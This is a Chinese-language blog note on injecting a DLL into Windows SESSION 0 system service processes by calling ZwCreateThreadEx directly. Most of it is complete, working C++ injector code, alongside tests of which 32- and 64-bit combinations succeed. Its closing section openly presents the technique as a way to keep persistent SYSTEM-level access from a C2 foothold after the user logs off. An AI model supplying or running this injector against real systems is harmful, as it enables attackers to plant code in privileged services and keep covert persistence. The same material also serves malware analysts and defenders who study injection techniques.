遠程執行緒注入DLL突破session 0 隔離
- 2021 年 9 月 14 日
- 筆記
- Windows黑客編程
遠程執行緒注入DLL突破session 0 隔離
0x00 前言
補充上篇的遠程執行緒注入,突破系統SESSION 0 隔離,向系統服務進程中注入DLL。
0x01 介紹
通過CreateRemoteThread實現的遠程執行緒注入,流程大致就是:
通過OpenProcess獲取目標進程句柄。
通過VirtualAllocEx在目標進程空間中申請記憶體,通過WriteProcessMemory放入需要載入的dll的路徑。
通過GetModuleHandleA獲取諸如kernel32.dll這類系統dll的模組句柄,進而獲取LoadLibraryA這類載入動態鏈接庫的函數地址(固定)
通過CreateRemoteThread的參數傳入目標進程對象句柄、寫入到目標進程空間的dll路徑、LoadLibraryA函數地址,實現中目標中創建多執行緒載入dll。
而如果想要突破SESSION 0隔離,實現遠程執行緒注入,則是使用比CreateRemoteThread更底層的內核API ZwCreateThreadEx。
這裡補充下SESSION 0隔離是什麼。
SESSION 0 隔離:
//docs.microsoft.com/zh-cn/previous-versions/msdn10/Ee791007(v=MSDN.10)
//docs.microsoft.com/zh-cn/previous-versions/ee663077(v=msdn.10)?redirectedfrom=MSDN
在Windows XP、Windows Server 2003,以及更老版本的Windows作業系統中,服務和應用程式使用相同的會話(Session)運行,而這個會話是由第一個登錄到控制台的用戶啟動的。該會話就叫做Session 0。
而從Windows Vista開始,只有服務可以託管到Session 0中,用戶應用程式和服務之間會被隔離,並需要運行在用戶登錄到系統時創建的後續會話中。例如第一個登錄的用戶創建 Session 1,第二個登錄的用戶創建Session 2,以此類推,如下圖所示。
為了避免應用程式許可權混亂造成的風險,微軟提供了SESSION 0 隔離機制,而攻擊者為了提升許可權操作服務擁有的許可權(SYSTEM)則又了突破SESSION 0 隔離。
這裡ZwCreateThreadEx函數在不同位數的系統擁有不同的函數聲明。
ZwCreateThreadEx函數聲明:
#ifdef _WIN64
typedef DWORD(WINAPI *typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
ULONG CreateThreadFlags,
SIZE_T ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
LPVOID pUnkown);
#else
typedef DWORD(WINAPI *typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
BOOL CreateSuspended,
DWORD dwStackSize,
DWORD dw1,
DWORD dw2,
LPVOID pUnkown);
#endif
為什麼CreateRemoteThread不能實現系統服務進程DLL注入?
書里直接解釋的是由於SESSION 0隔離機制在內核6.0之後(vista、7、8…),當創建一個進程後,並不會立即運行,通過先掛起進程,查看要運行的進程所在會話層之後再決定是否恢復進程運行(待逆向觀察)。
而CreateRemoteThread實現內部調用了ZwCreateThreadEx創建遠程執行緒,但是CreateSuspended的參數值為1導致執行緒無法恢復運行,導致DLL注入失敗。
而我們只需要直接調用ZwCreateThreadEx,並在程式運行指定CreateSuspended為0即可實現遠程執行緒注入DLL突破SESSION 0隔離。
0x02 編碼實現
由於ZwCreateThreadEx函數在nydll.dll中沒有聲明,所以需要通過GetProcAddress獲取ZwCreateThreadEx的函數地址來調用。
InjectDll.h
#ifndef _INJECT_DLL_H_
#define _INJECT_DLL_H_
#include <Windows.h>
// 使用 ZwCreateThreadEx 實現遠執行緒注入
BOOL ZwCreateThreadExInjectDll(DWORD dwProcessId, char* pszDllFileName);
#endif
Test_Session0_injectPID.cpp
// Test_Session0_injectPID.cpp : 此文件包含 "main" 函數。程式執行將在此處開始並結束。
//
#include <iostream>
#include "InjectDll.h"
void ShowError(char* pszText)
{
char szErr[MAX_PATH] = { 0 };
::wsprintf(szErr, "%s Error[%d]\n", pszText, ::GetLastError());
::MessageBox(NULL, szErr, "ERROR", MB_OK);
}
// 使用 ZwCreateThreadEx 實現遠執行緒注入
BOOL ZwCreateThreadExInjectDll(DWORD dwProcessId, char* pszDllFileName)
{
HANDLE hProcess = NULL;
SIZE_T dwSize = 0;
LPVOID pDllAddr = NULL;
FARPROC pFuncProcAddr = NULL;
HANDLE hRemoteThread = NULL;
DWORD dwStatus = 0;
// 打開注入進程,獲取進程句柄
hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if (NULL == hProcess)
{
ShowError("OpenProcess");
return FALSE;
}
// 在注入進程中申請記憶體
dwSize = 1 + ::lstrlen(pszDllFileName);
pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
if (NULL == pDllAddr)
{
ShowError("VirtualAllocEx");
return FALSE;
}
// 向申請的記憶體中寫入數據
if (FALSE == ::WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL))
{
ShowError("WriteProcessMemory");
return FALSE;
}
// 載入 ntdll.dll
HMODULE hNtdllDll = ::LoadLibrary("ntdll.dll");
if (NULL == hNtdllDll)
{
ShowError("LoadLirbary");
return FALSE;
}
// 獲取LoadLibraryA函數地址
pFuncProcAddr = ::GetProcAddress(::GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
if (NULL == pFuncProcAddr)
{
ShowError("GetProcAddress_LoadLibraryA");
return FALSE;
}
// 獲取ZwCreateThread函數地址
#ifdef _WIN64
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
ULONG CreateThreadFlags,
SIZE_T ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
LPVOID pUnkown);
#else
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
BOOL CreateSuspended,
DWORD dwStackSize,
DWORD dw1,
DWORD dw2,
LPVOID pUnkown);
#endif
typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)::GetProcAddress(hNtdllDll, "ZwCreateThreadEx");
if (NULL == ZwCreateThreadEx)
{
ShowError("GetProcAddress_ZwCreateThread");
return FALSE;
}
// 使用 ZwCreateThreadEx 創建遠執行緒, 實現 DLL 注入
dwStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, 0, 0, 0, NULL);
if (NULL == hRemoteThread)
{
ShowError("ZwCreateThreadEx");
return FALSE;
}
// 關閉句柄
::CloseHandle(hProcess);
::FreeLibrary(hNtdllDll);
return TRUE;
}
int main(int argc, char* argv[])
{
#ifndef _WIN64
BOOL bRet = ZwCreateThreadExInjectDll(atoi(argv[1]), argv[2]);
#else
BOOL bRet = ZwCreateThreadExInjectDll(atoi(argv[1]), argv[2]);
#endif
if (FALSE == bRet)
{
std::cout << "Inject Dll Error.\n";
}
std::cout << "Inject Dll OK.\n";
return 0;
}
0x03 效果測試
通過procexp可查看進程所屬session。
編寫了多個位數的inject 程式,多個位數的dll。
結果發現:
x64 inject程式遠程執行緒注入x64 dll到x64可行。
x64 inject程式遠程執行緒注入x86 dll到x64可行,但是沒成功到目標x64程式。
X86 inject程式遠程執行緒注入x64 dll到x64不可行。
X86 inject程式遠程執行緒注入x86 dll到x64不可行。
測試成功注入DLL到SESSION 0進程。
0x04 總結
會話隔離會導致諸多問題,比如一個c2的會話是system,不能截屏看到用戶介面,只能以用戶許可權進程螢幕截屏。不過這裡突破session 0到系統服務後可以方便維權,只要機器不關,就算用戶退出登錄,也可以持久維權。
0x05 參考
//www.cnblogs.com/gnielee/archive/2010/04/07/session0-isolation-part1.html
//www.cnblogs.com/gnielee/archive/2010/04/08/session0-isolation-part2.html
//docs.microsoft.com/zh-cn/previous-versions/msdn10/Ee791007(v=MSDN.10)
//docs.microsoft.com/zh-cn/previous-versions/ee663077(v=msdn.10)?redirectedfrom=MSDN
